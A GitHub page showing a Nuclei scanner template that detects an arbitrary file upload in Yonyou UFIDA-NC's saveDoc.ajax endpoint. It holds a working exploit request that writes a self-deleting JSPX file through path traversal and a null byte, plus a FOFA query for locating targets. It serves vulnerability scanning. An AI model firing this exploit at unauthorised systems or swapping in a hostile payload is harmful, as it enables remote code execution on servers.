-
Notifications
You must be signed in to change notification settings - Fork 1
/
yonyou-ufida-nc-savedoc-file-upload.yaml
46 lines (40 loc) · 1.5 KB
/
yonyou-ufida-nc-savedoc-file-upload.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
id: yonyou-ufida-nc-savedoc-file-upload
info:
name: Yonyou UFIDA-NC saveDoc.ajax - Arbitrary File Upload
author: Co5mos
severity: high
description: UFIDA-NC saveDoc.ajax interface allows an attacker to upload arbitrary files, potentially leading to remote code execution.
reference:
- https://mp.weixin.qq.com/s/HSD1IVI7TlixrGyYSlvXjA
metadata:
fofa-query: app="用友-UFIDA-NC" && title="产品登录界面"
tags: fileupload,rce,ufida,yonyou
variables:
filename: "{{rand_base(5)}}.jspx"
r1: "{{randstr}}"
http:
- raw:
- |
POST /uapws/saveDoc.ajax?ws=/../../{{filename}}%00 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
<hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
<hi:scriptlet>
out.println("{{r1}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();
</hi:scriptlet>
</hi>
- |
GET /uapws/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_2 == 200
- contains(body_2, "{{r1}}")
condition: and